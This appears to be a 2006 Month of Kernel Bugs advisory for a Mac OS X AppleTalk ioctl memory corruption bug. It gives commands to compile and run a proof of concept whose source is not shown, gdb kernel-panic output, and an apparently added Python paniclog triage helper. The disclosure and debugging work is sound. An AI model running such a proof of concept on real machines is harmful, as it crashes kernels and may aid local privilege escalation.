MOKB-27-11-2006 OMG! PWNIES! M4C BUGS NOW COME IN P1NK!

Bug details
Title: Mac OS X AppleTalk AIOCREGLOCALZN Ioctl Memory Corruption OMG! PWNIES! DADDY I WANT M4C P0NYMONK3YS!
Description: The Mac OS X AppleTalk protocol handling code is vulnerable to an exploitable memory corruption issue. This particular vulnerability is caused by a failure to validate the input data of the AIOCREGLOCALZN ioctl command, and can be abused by unprivileged users by opening an AppleTalk socket and issuing the ioctl control command with a crafted data structure.
Author/Contributor: NA<NA[at] info-pull.com> - discovery, MoKB release, debugging.
References:
Proof of concept or exploit: The following proof of concept / exploit can be used to reproduce the bug (requires Xcode/GNU GCC compiler to be installed): MOKB-27-11-2006.c (x86)
gcc MOKB-27-11-2006.c -o MOKB-27-11-2006 && ./MOKB-27-11-2006
Note: AppleTalk stack must have been started:
sudo appletalk -u en0
Debugging information:

It's been tested on an up-to-date (27-11-2006) Mac OS X installation, running on an Intel "shipping" Mac (x86).


alkali:/tmpNA $ gdb /Volumes/KernelDebugKit/mach_kernel -c core-xnu-792.13.8-172.16.0.10-a16a4845
GNU gdb 6.3.50-20050815 (Apple version gdb-573) (Fri Oct 20 15:50:43 GMT 2006)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-apple-darwin"...
#0  Debugger (message=0x3c9540 "panic") at /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c:770
Line number 770 out of range; /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c has 312 lines.
(gdb) source /Volumes/KernelDebugKit/kgmacros
Loading Kernel GDB Macros package.  Type "help kgm" for more info.

(gdb) paniclog
panic(cpu 1 caller 0x001A3135): Unresolved kernel trap (CPU 1, Type 14=page fault), registers:
CR0: 0x80010033, CR2: 0x00000000, CR3: 0x00d72000, CR4: 0x000006e0
EAX: 0x00000000, EBX: 0x00000000, ECX: 0x000000f4, EDX: 0x000000f5
CR2: 0x00000000, EBP: 0x00000000, ESI: 0x00000000, EDI: 0x00000000
EFL: 0x00010206, EIP: 0x00000000, CS:  0x00000004, DS:  0x0000000c

Backtrace, Format - Frame : Return Address (4 potential args on stack)
0x13ef39d8 : 0x128d1f (0x3c9540 0x13ef39fc 0x131df4 0x0)
0x13ef3a18 : 0x1a3135 (0x3cf1f4 0x1 0xe 0x3cea24)
0x13ef3b28 : 0x19a8d4 (0x13ef3b38 0xf457b9e1 0xe 0x39210048) Backtrace terminated-invalid frame pointer 0x0

Kernel version:
Darwin Kernel Version 8.8.1: Mon Sep 25 19:42:00 PDT 2006; root:xnu-792.13.8.obj~1/RELEASE_I386

(gdb) info registers
eax            0x0      0
ecx            0x0      0
edx            0x0      0
ebx            0x1      1
esp            0x13ef394c       0x13ef394c
ebp            0x13ef39d8       0x13ef39d8
esi            0x1      1
edi            0x1000   4096
eip            0x1a8674 0x1a8674 
eflags         0x0      0
cs             0x0      0
ss             0x0      0
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) showcurrentstacks
task        vm_map      ipc_space  #acts   pid  proc        command
0x025bfda0  0x013d6f3c  0x02589ef0   45      0  0x004d2200  kernel_task
            activation  thread      pri  state  wait_queue  wait_event
            0x025dec64  0x025dec64    0  IR
                reserved_stack=0x13e10000
                kernel_stack=0x13fe0000
                stacktop=0x13fe3f18
                0x13fe3f18  0x1a42f5 <machine_idle_cstate+32>
                0x13fe3f38  0x19d871 <machine_idle+128>
                0x13fe3f58  0x135f23 <idle_thread+96>
                0x13fe3fc8  0x19a74c <call_continuation+28>
                stackbottom=0x13fe3fc8

task        vm_map      ipc_space  #acts   pid  proc        command
0x025bce60  0x013d67d0  0x02589550    1    188  0x02c1f7d0  appletalk1
            activation  thread      pri  state  wait_queue  wait_event
            0x0272dd08  0x0272dd08   31  R
                kernel_stack=0x13ef0000
                stacktop=0x13ef39d8
                0x13ef39d8  0x128d1f <panic+382>
                0x13ef3a18  0x1a3135 <kernel_trap+1538>
                0x13ef3b28  0x19a8d4 <trap_from_kernel+19>
                stackbottom=0x13ef3b28

(gdb) showmapvme 0x013d67d0
vm_map      pmap        vm_size    #ents rpage  hint        first_free
0x013d67d0  0x025c1d50  0x21a9c000   21     84  0x02c477bc  0x02c771e4
    entry       start               prot #page  object      offset
    0x02bf9688  0x0000000000000000  00C      1  0x00000000  0x0000000000000000
    0x02cdb1b8  0x0000000000001000  57Cn     1  0x02cee2a8  0x0000000000000000
    0x02cdb5ac  0x0000000000002000  33C      1  0x02bb3bb0  0x0000000000000000
    0x02b948c4  0x0000000000003000  33C      1  0x00000000  0x0000000000000000
    0x02b94554  0x0000000000004000  77C      1  0x02cc3d48  0x0000000000000000
    0x02c771e4  0x0000000000005000  13Cn     1  0x02cee2a8  0x0000000000003000
    0x02ce89a0  0x0000000000100000  37C    261  0x02d94908  0x0000000000000000
    0x02c77318  0x0000000000300000  37C    261  0x02e0df68  0x0000000000000000
    0x02d5c0b0  0x0000000000800000  37C   2056  0x02c4a088  0x0000000000000000
    0x02cdb580  0x0000000001800000  37C   2056  0x02886908  0x0000000000000000
    0x02c77294  0x000000008fe00000  57Cn    74  0x027e2770  0x00000000000d4000
    0x02cc25ac  0x000000008fe4a000  37C      7  0x02d94198  0x0000000000000000
    0x02c930dc  0x000000008fe51000  37C      3  0x02c94770  0x0000000000000000
    0x02c80c34  0x000000008fe54000  77Cn     1  0x027e2770  0x0000000000125000
    0x02c77790  0x000000008fe55000  17Cn    20  0x027e2770  0x0000000000126000
    0x02d5e1e4  0x0000000090000000  11Ss 65536  0x013d6ce4  0x0000000000000000
    0x02c477bc  0x00000000a0000000  33C     10  0x02e17990  0x0000000000000000
    0x02c4d4fc  0x00000000a000a000  33C      7  0x02bd0b28  0x0000000000000000
    0x02cc2840  0x00000000a0011000  11Ss 65519  0x013d6c80  0x0000000000011000
    0x02c6c604  0x00000000bf800000  37C   2048  0x02df9ee0  0x0000000000000000
    0x02ce8478  0x00000000fffec000  55-     19  0x025b7660  0x0000000000000000

(gdb) x/24x 0x13ef3b28
0x13ef3b28:     0x00000000      0x0019a8d4      0x13ef3b38      0xf457b9e1
0x13ef3b38:     0x0000000e      0x39210048      0x0000000c      0x0000000c
0x13ef3b48:     0x0000000c      0x00000000      0x00000000      0x00000000
0x13ef3b58:     0x00000000      0x00000000      0x000000f5      0x000000f4
0x13ef3b68:     0x00000000      0x0000000e      0x00000010      0x00000000
0x13ef3b78:     0x00000004      0x00010206      0x00000000      0x00000000	<--
(gdb) x/24x 0x13ef39d8
0x13ef39d8:     0x13ef3a18      0x00128d1f      0x003c9540      0x13ef39fc
0x13ef39e8:     0x00131df4      0x00000000      0x9894bec8      0x0000000e
0x13ef39f8:     0x13ef3a18      0x13ef3a70      0x003d0384      0x0000000e
0x13ef3a08:     0x00000000      0x80010033      0x00000001      0x003cea24  <--
0x13ef3a18:     0x13ef3b28      0x001a3135      0x003cf1f4      0x00000001
0x13ef3a28:     0x0000000e      0x003cea24      0x80010033      0x00000000  <--
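Reading the paniclog above: trap Type 14 is an i386 page fault, CR2 holds the faulting linear address, and both CR2 and EIP are 0x00000000, so the CPU faulted while trying to fetch an instruction from address 0. The helper below is an added triage example, not part of the MoKB release or its PoC; it parses a Darwin 8 paniclog in the format shown (the sample is constructed from this page's own output) and flags that pattern along with the truncated backtrace.

```python
import re
# Constructed sample: the paniclog lines printed by the kgmacros session above.
PANICLOG = """\
panic(cpu 1 caller 0x001A3135): Unresolved kernel trap (CPU 1, Type 14=page fault), registers:
CR0: 0x80010033, CR2: 0x00000000, CR3: 0x00d72000, CR4: 0x000006e0
EAX: 0x00000000, EBX: 0x00000000, ECX: 0x000000f4, EDX: 0x000000f5
CR2: 0x00000000, EBP: 0x00000000, ESI: 0x00000000, EDI: 0x00000000
EFL: 0x00010206, EIP: 0x00000000, CS:  0x00000004, DS:  0x0000000c
Backtrace, Format - Frame : Return Address (4 potential args on stack)
0x13ef39d8 : 0x128d1f (0x3c9540 0x13ef39fc 0x131df4 0x0)
0x13ef3a18 : 0x1a3135 (0x3cf1f4 0x1 0xe 0x3cea24)
0x13ef3b28 : 0x19a8d4 (0x13ef3b38 0xf457b9e1 0xe 0x39210048) Backtrace terminated-invalid frame pointer 0x0
"""

HEADER_RE = re.compile(r"panic\(cpu (\d+) caller (0x[0-9a-fA-F]+)\): .*Type (\d+)=([^)]+)\)")
REG_RE = re.compile(r"\b([A-Z][A-Z0-9]{1,2}):\s+(0x[0-9a-fA-F]+)")
FRAME_RE = re.compile(r"^(0x[0-9a-fA-F]+) : (0x[0-9a-fA-F]+) \(([^)]*)\)")

def parse_paniclog(text):
    """Return cpu, caller, trap type/name, saved registers and backtrace frames."""
    info = {"regs": {}, "frames": [], "truncated": False}
    for line in text.splitlines():
        m = HEADER_RE.search(line)
        if m:
            info["cpu"], info["caller"] = int(m.group(1)), int(m.group(2), 16)
            info["trap_type"], info["trap_name"] = int(m.group(3)), m.group(4).strip()
            continue
        m = FRAME_RE.match(line)
        if m:  # (frame pointer, return address, up to 4 potential args on the stack)
            info["frames"].append((int(m.group(1), 16), int(m.group(2), 16),
                                   [int(a, 16) for a in m.group(3).split()]))
            info["truncated"] |= "invalid frame pointer" in line
            continue
        for reg, val in REG_RE.findall(line):  # CR0/CR2/EAX/.../EIP register lines
            info["regs"][reg] = int(val, 16)
    return info

def triage(info):
    """Heuristic notes for an i386 trap 14 (page fault); CR2 holds the faulting address."""
    notes, eip, cr2 = [], info["regs"].get("EIP"), info["regs"].get("CR2")
    if info.get("trap_type") == 14 and eip is not None and cr2 is not None:
        if eip == cr2 and eip < 0x1000:
            notes.append("instruction fetch from the NULL page: control flow reached address 0 "
                         "(NULL or corrupted function pointer)")
        elif cr2 < 0x1000:
            notes.append("data access to the NULL page: NULL pointer dereference")
    if info["truncated"]:
        notes.append("backtrace cut off by invalid frame pointer: stack may be corrupted")
    return notes
```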